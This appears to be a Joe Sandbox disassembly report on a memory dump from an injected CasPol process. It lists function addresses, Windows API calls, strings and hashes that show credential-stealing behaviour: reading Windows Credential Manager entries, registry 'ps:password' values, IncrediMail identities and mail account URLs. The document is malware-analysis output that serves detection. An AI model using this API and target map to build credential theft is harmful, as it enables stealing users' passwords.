                                                                                                                                                                                    Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                    Function 0040FFB0 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 0040FFD8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                    • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                    Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                    Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                    • String ID: Creds$ps:password
                                                                                                                                                                                    • API String ID: 551151806-1872227768
                                                                                                                                                                                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                    Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                    Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                    Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                    • API String ID: 714388716-318151290
                                                                                                                                                                                    • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                    • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                    Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                    Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                    • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                                                                                                    • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                    • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                    Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                                                                                                    • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                    • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                    Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                                                    • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
